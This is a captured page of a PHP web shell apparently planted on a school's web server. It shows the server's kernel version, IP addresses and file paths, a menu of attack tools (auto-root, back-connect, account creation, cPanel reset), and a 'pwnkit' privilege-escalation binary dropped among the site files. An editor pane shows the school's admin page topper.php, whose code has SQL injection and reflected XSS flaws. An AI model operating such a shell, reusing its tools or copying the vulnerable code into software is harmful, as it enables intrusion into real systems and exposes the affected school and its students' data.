Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.129.211.190
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
nbspublicschool /
public_html /
nbs_website /
[ HOME SHELL ]
Name
Size
Permission
Action
_saving
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
font-awesome-4.7.0
[ DIR ]
drwxr-xr-x
image
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-dashboard.php
1.76
KB
-rw-r--r--
changepass.php
5.84
KB
-rw-r--r--
disclosure.php
9.45
KB
-rw-r--r--
enquiry.php
5.22
KB
-rw-r--r--
faculty.php
10.86
KB
-rw-r--r--
gallery.php
10.98
KB
-rw-r--r--
homework.php
12.56
KB
-rw-r--r--
index.php
2.39
KB
-rw-r--r--
logout.php
174
B
-rw-r--r--
news.php
9.74
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
subject_tit.php
9.06
KB
-rw-r--r--
syllabus.php
10.28
KB
-rw-r--r--
tc.php
11.2
KB
-rw-r--r--
topper.php
12.28
KB
-rw-r--r--
video.php
11.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : topper.php
<?php include("include/header1.php"); if(!empty($_POST['top'])){ $obj->topper(); } if(!empty($_POST['mul_del'])){ foreach($_POST['mul_del'] as $code) { $id= $code; $photo_sql= "SELECT topper_img FROM topper WHERE topper_id='".$id."'"; $rs= mysqli_query($obj->mysqli,$photo_sql); $photo= mysqli_fetch_assoc($rs); if(is_file('_saving/topper/'.$photo['topper_img'])){ unlink('_saving/topper/'.$photo['topper_img']); } } $col= 'topper_id'; $table= 'topper'; $page= 'topper.php'; $img= "topper_img"; $path= "_saving/topper/"; $obj->delete_multiple($col,$table,$page); } if(!empty($_REQUEST['edit'])){ $val= $_REQUEST['edit']; $row= $obj->getRecord('topper','topper_id',$val); } ?> <!-- Left side column. contains the logo and sidebar --> <aside class="main-sidebar"> <!-- sidebar: style can be found in sidebar.less --> <section class="sidebar"> <!-- Sidebar user panel --> <!-- /.search form --> <!-- sidebar menu: : style can be found in sidebar.less --> <?php include 'include/sidebar.php'; ?> <?php include 'include/admin-menu.php'; ?> </section> <!-- /.sidebar --> </aside> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <?php if(!empty($_REQUEST['msg'])){ echo '<section class="content-header"> <div class="row"> <div class="col-md-12"> <div class="alert alert-success alert-dismissable"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><i class="icon fa fa-check"></i>'.$_REQUEST['msg'].'</h4> </div> </div> </div> </section>'; } ?> <?php if(!empty($obj->errorMsg)){ ?> <section class="content-header"> <div class="row"> <div class="col-md-12"> <div class="alert alert-success alert-dismissable"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><i class="icon fa fa-check"></i> <?php echo $obj->errorMsg; ?></h4> </div> </div> </div> </section> <?php } ?> <section class="content-header"> <h1> Topper Entry </h1> <div class="col-lg-12"> <ol class="breadcrumb"> <li><a href="admin-dashboard.php"><i class="fa fa-dashboard"></i> Dashboard</a></li> <li><a href="news.php" class="btn btn-success btn-sm">News</a></li> <li><a href="enquiry.php" class="btn btn-success btn-sm">Enquiry</a></li> <li><a href="faculty.php" class="btn btn-success btn-sm">Faculty</a></li> <li><a href="tc.php" class="btn btn-success btn-sm">TC</a></li> <li><a href="homework.php" class="btn btn-success btn-sm">Homework</a></li> <li><a href="gallery.php" class="btn btn-success btn-sm">Gallery</a></li> <li><a href="video.php" class="btn btn-success btn-sm">Video</a></li> <li><a href="syllabus.php" class="btn btn-success btn-sm">syllabus</a></li> <li><a href="disclosure.php" class="btn btn-success btn-sm">Document Disclosure</a></li> <li class="active">topper Entry</li> </ol> </div> </section> <section class="content"> <div class="row"> <div class="col-md-12"> <div class="box box-primary"> <form role="form" action="" method="post" enctype="multipart/form-data" name="faculty_form" id="faculty_form" data-toggle="validator"> <div class="box-body"> <div class="form-group col-md-6"> <label>Topper Name</label> <input type="text" class="form-control" name="topper_name" id="topper_name" placeholder="Enter a Topper Name..." value="<?= isset($row)? $row['topper_name'] : ''?>" autocomplete="off" onkeyup="livesearch('topper_name','[^A-Za-z ]')" onkeydown="livesearch('topper_name','[^A-Za-z ]')"> </div> <div class="form-group col-md-6"> <label>Class</label> <select class="form-control" name="topper_class" id="topper_class"> <option value="">-- Select Class --</option> <option value="Class Nursery">Class Nursery</option> <option value="Class Prep">Class Prep</option> <option value="Class K.G">Class K.G</option> <option value="Class 1">Class 1</option> <option value="Class 2">Class 2</option> <option value="Class 3">Class 3</option> <option value="Class 4">Class 4</option> <option value="Class 5">Class 5</option> <option value="Class 6">Class 6</option> <option value="Class 7">Class 7</option> <option value="Class 8">Class 8</option> <option value="Class 9">Class 9</option> <option value="Class 10">Class 10</option> <option value="Class 11">Class 11</option> <option value="Class 12">Class 12</option> </select> </div> <div class="form-group col-md-6"> <label>Percentage ( % )</label> <input type="text" class="form-control" name="topper_percent" id="topper_percent" placeholder="Enter a Percentage..." value="<?= isset($row)? $row['topper_percent'] : ''?>" autocomplete="off"> </div> <div class="form-group col-md-6"> <label>Image</label> <?php if(isset($row)){ echo '<input type="file" class="form-control" name="topper_img">'; } else{ echo '<input type="file" class="form-control" name="topper_img">'; } ?> <?php if(isset($row)){ if(is_file('_saving/topper/'.$row['topper_img'])){ echo "<br><br>"; echo "<img src='_saving/topper/$row[topper_img]' height='80'>"; } } ?> </div> <div class="clearfix"></div> <div class="form-group col-md-12" style="margin-top:1.8em"> <?php if(isset($row)== TRUE){ ?> <input type="hidden" name="topper_id" value="<?= $row['topper_id']?>" /> <input type="hidden" name="topper_img" value="<?= $row['topper_img']?>" /> <?php } ?> <input type="hidden" name="top" value="1"> <button type="submit" name="submit" class="btn btn-primary btn-xs"><?= isset($row)? 'Update' : 'Save'?></button> <button type="reset" name="reset" class="btn btn-primary btn-xs">Reset</button> </div> </div> <!-- /.box-body --> </form> </div> </div> </div> </section> <!-- /.content --> <section class="content-header"> <h1>Topper View <small></small> </h1> </section> <!-- Main content --> <section class="content"> <div class="row"> <div class="col-xs-12"> <div class="box"> <div class="box-header"> <h3 class="box-title"></h3> </div> <!-- /.box-header --> <div class="box-body"> <form id="vnews" action="topper.php" method="post"> <table id="example1" class="table table-bordered table-striped table-responsive"> <thead> <tr> <th>#</th> <th>Sr. No.</th> <th>Topper Name</th> <th>Class</th> <th>Percentage</th> <th>Image</th> <th>Date</th> <th>Action</th> </tr> </thead> <?php $res= $obj->getTable('topper','topper_id desc'); if($res){ $i=1; foreach($res as $topper_data){ ?> <tr> <td scope="col"><input type="checkbox" name="mul_del[]" id="mul_del[]" value="<?= $topper_data['topper_id'] ?>" /></td> <td scope="col"><?= $i++ ?></td> <td scope="col"><?= $topper_data['topper_name']?></td> <td scope="col"><?= $topper_data['topper_class']?></td> <td scope="col"><?= $topper_data['topper_percent']?></td> <td scope="col"><img src="_saving/topper/<?= $topper_data['topper_img'] ?>" width="60" height="60"/></td> <td><?= date('d M Y',strtotime($topper_data['sub_date'])) ?></td> <td class="center"> <a class="btn btn-info btn-sm" href="topper.php?edit=<?= $topper_data['topper_id']?>"> <i class="glyphicon glyphicon-edit icon-white"></i> Edit </a> <a class="btn btn-danger btn-sm" href="javascript:muldelete()"> <i class="glyphicon glyphicon-trash icon-white"></i> Delete </a> </td> </tr> <?php } } ?> </table> </form> </div> <!-- /.box-body --> </div> <!-- /.box --> </div> <!-- /.col --> </div> <!-- /.row --> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php include 'include/footer.php'; ?> <div class="control-sidebar-bg"></div> </div> <!-- ./wrapper --> <!-- ./wrapper --> <script src="plugins/jQuery/jQuery-2.1.4.min.js"></script> <script src="js/jquery.min.js"></script> <script type="text/javascript" src="js/jquery.mousewheel.min.js"></script> <script type="text/javascript" src="js/jquery.dateselect.js"></script> <script src="js/jquery-ui.min.js"></script> <script src="bootstrap/js/bootstrap.min.js"></script> <script src="plugins/datatables/jquery.dataTables.min.js"></script> <script src="plugins/datatables/dataTables.bootstrap.min.js"></script> <script src="js/jquery.validate.min.js"></script> <script src="dist/js/app.min.js"></script> <script type="text/javascript" src="js/jquery-ui.min.js"></script> <script> $.widget.bridge('uibutton', $.ui.button); $(function () { $("#example1").DataTable(); $('#example2').DataTable({ "paging": true, "lengthChange": false, "searching": false, "ordering": true, "info": true, "autoWidth": true }); }); $(document).ready(function(){ $('#faculty_form').validate({ rules: { topper_name: { required: true }, topper_class: { required: true }, topper_percent: { required: true }, }, messages: { topper_name: { required: "Please Enter Name", }, topper_class: { required: "Please Enter Class", }, topper_percent: { required: "Please Enter Percentage", }, }, highlight: function(element){ $(element).closest('.form-group').addClass('has-error').removeClass('has-success'); //$(element).next('span').addClass('fa fa-times-circle').removeClass('fa fa-check-circle'); }, unhighlight: function(element){ $(element).closest('.form-group').addClass('has-success').removeClass('has-error'); //$(element).next('span').addClass('fa fa-check-circle').removeClass('fa fa-times-circle'); }, errorElement: 'span', errorClass: 'help-block', //errorPlacement: '', }); }); function livesearch(e,r) { var textfield= document.getElementById(e); var regx= new RegExp(r, 'g'); textfield.value= textfield.value.replace(regx,''); } function muldelete() { element_lenght= vnews.elements.length; for(i=0;i<element_lenght;i++) { if(vnews.elements[i].name=="mul_del[]") { if(vnews.elements[i].checked==true) { if(confirm("Are you sure delete record(s)?")) { this.vnews.submit(); break; } } } } } </script> </body> </html>
Close